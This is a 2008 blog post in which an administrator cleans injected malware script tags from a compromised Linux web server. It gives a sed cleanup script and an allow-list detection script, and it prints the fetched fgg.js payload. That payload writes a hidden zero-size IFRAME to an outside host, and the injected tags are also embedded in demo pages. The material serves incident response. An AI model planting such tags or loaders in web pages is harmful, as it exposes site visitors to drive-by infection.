Tuesday, August 05, 2008

Malware Attack

Last Wednesday, my colleague told me that one of our servers had been attacked by malware and that his Firefox 3 browser "Reported Attack Site!"

I was wondering how they knew that our server was suspected of serving malware. After some Googling, I found the following articles very useful in understanding this new type of attack, called Drive-by Download.

Basically, there are a couple of ways a malware script gets embedded in your server's pages:

  • a public forum that allows users to embed arbitrary HTML such as IFRAME or SCRIPT tags
  • advertisements from untrusted content; it is difficult to maintain trust along such long advertisement delivery chains
  • exploiting a vulnerability in the browser or one of its plugins
  • exploiting a vulnerability in the server

Today, my boss told us that the Linux server was under malware attack and asked whether I 'know' Linux. Whenever people ask whether I 'know' something, I need them to define 'know'. Anyway, this was a golden opportunity for me to have a first-hand 'encounter' with malware. After traversing the directories, I found 200+ web pages with this JavaScript embedded at the end of the page:
<script src=http://www.kr92.ru/fgg.js></script>
This pattern tallies with what the above articles described. It is time to clean up all these pages. I remember this blog showed a very handy way to edit a file using sed without having to create a temporary file: the "-i" flag in sed lets you edit the file directly (FYI, sed in Solaris does not have this flag). Here is my on-the-fly script:

#! /bin/sh

# Walk the tree and handle every .html/.htm file. Reading from a pipe with
# "read -r" copes with paths containing spaces, which a backtick-expanded
# "for" loop would split into separate words.
find . -type f \( -name "*.html" -o -name "*.htm" \) | while IFS= read -r i
do
        # -q: only the exit status matters; -F: match the hostname literally
        if grep -qF "www.kr92.ru" "$i"; then
                echo "Removing www.kr92.ru - $i ..."
                # -i edits in place; '#' as the s/// delimiter avoids escaping the slashes in the URL
                sed -i -e 's#<script src=http://www.kr92.ru/fgg.js></script>##' "$i"
                # Re-check so we notice any page where the tag survived (e.g. a different spelling)
                if grep -qF "www.kr92.ru" "$i"; then
                        echo Unsuccessful
                else
                        echo OK
                fi
        fi
done

I wanted to find out what is inside http://www.kr92.ru/fgg.js:

$ curl http://www.kr92.ru/fgg.js
window.status="";
n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN")&&(n!="ZH-MO")&&(n!="ZH-HK")&&(n!="BN")&&(n!="GU")&&(n!="NE")&&(n!="PA")&&(n!="ID")&&(n!="EN-PH")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="VI")){
var cookieString = document.cookie;
var start = cookieString.indexOf("v1goo=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+9*3600*1000);
document.cookie = "v1goo=update;expires="+expires.toGMTString();
try{
document.write("<iframe src=http://ojns.ru/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
}
catch(e)
{
};
}}

Apparently it is trying to include a zero-width, zero-height IFRAME (http://ojns.ru/cgi-bin/index.cgi?ad) in your page. Before doing so it checks the browser language and skips a list of locales (Chinese, Russian, Korean, Thai, Vietnamese and several others), and it sets a "v1goo" cookie that expires after 9 hours so the IFRAME is written only once per visitor within that window, which keeps the injection from being noticed on every page load.

According to this article, 200+ different forms of script reference have been reported. Scary, isn't it? While I was writing this blog, my boss told me that the main page has this embedded:
<script src=http://www.8hcs.ru/js.js></script>

I will likely have to modify my script to cater for the various forms of script reference, using regular expression matching to catch all those culprits.
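Here is one way to generalise the cleanup, added as an example and not the post's own script: instead of deleting one literal URL, it flags any external <script src=...> whose host is not on an allow-list (ALLOWED_HOSTS, with the hostnames www.example.com and cdn.example.com chosen for the demo), plus any zero-size IFRAME, keeps a .bak copy of each page before editing, and removes exactly the tags it reported. The sample pages are constructed for the demo (the injection strings are modelled on the two seen in this post and on fgg.js), and the script assumes GNU grep -o and GNU sed -i as on the Linux server described above.

```shell
#!/bin/sh
# Added example (not from the original post): allow-list based detection and
# removal of injected <script src=...> tags and hidden 0x0 iframes.
# ALLOWED_HOSTS and the sample pages in make_sample_dir are constructed.

# Hosts our pages are allowed to load scripts from (assumption; dots escaped for ERE).
ALLOWED_HOSTS='www\.example\.com|cdn\.example\.com'

# ERE for an external script tag (quoted or unquoted src) and for a 0x0 iframe.
SCRIPT_RE='<script[^>]*src="?https?://[^"> ]+[^>]*>[[:space:]]*</script>'
IFRAME_RE='<iframe[^>]*width="?0"?[^>]*height="?0"?[^>]*>[[:space:]]*</iframe>'

# list_suspect FILE: print one injected tag per line (prints nothing if clean).
# The allow-list check requires a delimiter right after the host, so a
# lookalike such as www.example.com.evil.ru is still reported.
list_suspect() {
    {
        grep -oE "$SCRIPT_RE" "$1" | grep -vE "src=\"?https?://($ALLOWED_HOSTS)[\"/> ]"
        grep -oE "$IFRAME_RE" "$1"
    } 2>/dev/null || true
}

# count_suspect FILE: number of injected tags found in FILE.
count_suspect() {
    list_suspect "$1" | wc -l | tr -d ' '
}

# escape_bre STRING: turn a literal tag into a sed basic regex (delimiter '#').
escape_bre() {
    printf '%s' "$1" | sed -e 's/[][\\.*^$#]/\\&/g'
}

# clean_file FILE: keep a .bak copy as evidence, then delete each suspect tag literally.
clean_file() {
    cp -p "$1" "$1.bak"
    list_suspect "$1" | while IFS= read -r tag; do
        pat=$(escape_bre "$tag")
        sed -i -e "s#$pat##g" "$1"
    done
}

# clean_tree DIR: apply clean_file to every .html/.htm page that needs it.
clean_tree() {
    find "$1" -type f \( -name '*.html' -o -name '*.htm' \) | while IFS= read -r f; do
        if [ "$(count_suspect "$f")" -gt 0 ]; then
            echo "Cleaning $f ..."
            clean_file "$f"
        fi
    done
}

# make_sample_dir: write constructed pages into a fresh temp directory, print its path.
make_sample_dir() {
    d=$(mktemp -d)
    cat > "$d/index.html" <<'EOF'
<html><body>Welcome
<script src="http://www.example.com/site.js"></script>
</body></html>
<script src=http://www.kr92.ru/fgg.js></script>
<script src="http://www.8hcs.ru/js.js"></script>
<iframe src=http://ojns.ru/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>
EOF
    cat > "$d/about.htm" <<'EOF'
<html><body>About us
<script src="https://cdn.example.com/app.js"></script>
<script src="http://www.example.com.evil.ru/x.js"></script>
</body></html>
EOF
    echo "$d"
}

# demo: report, clean, report again, then remove the temp directory.
demo() {
    d=$(make_sample_dir)
    for f in "$d"/*.html "$d"/*.htm; do
        echo "before: $f has $(count_suspect "$f") suspect tag(s)"
    done
    clean_tree "$d"
    for f in "$d"/*.html "$d"/*.htm; do
        echo "after:  $f has $(count_suspect "$f") suspect tag(s)"
    done
    rm -rf "$d"
}

demo
```

The allow-list is the important design choice: with 200+ reported variants a deny-list of bad hostnames is never complete, whereas the set of hosts your own pages legitimately load scripts from is small and known. Deleting the exact strings that were reported (rather than a broad regex) means the log of what was removed is also the evidence, and the .bak copies let you diff any page afterwards.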


2 Comments:

Blogger Crochaysie said...

I would love to know a couple of the files you were finding this in so I can check on my site and see if I'm finding anything familiar.

3:18 AM  
Blogger chihungchan said...

See my new post http://chihungchan.blogspot.com/2010/05/malware-attack-reply-comment.html

9:40 PM  
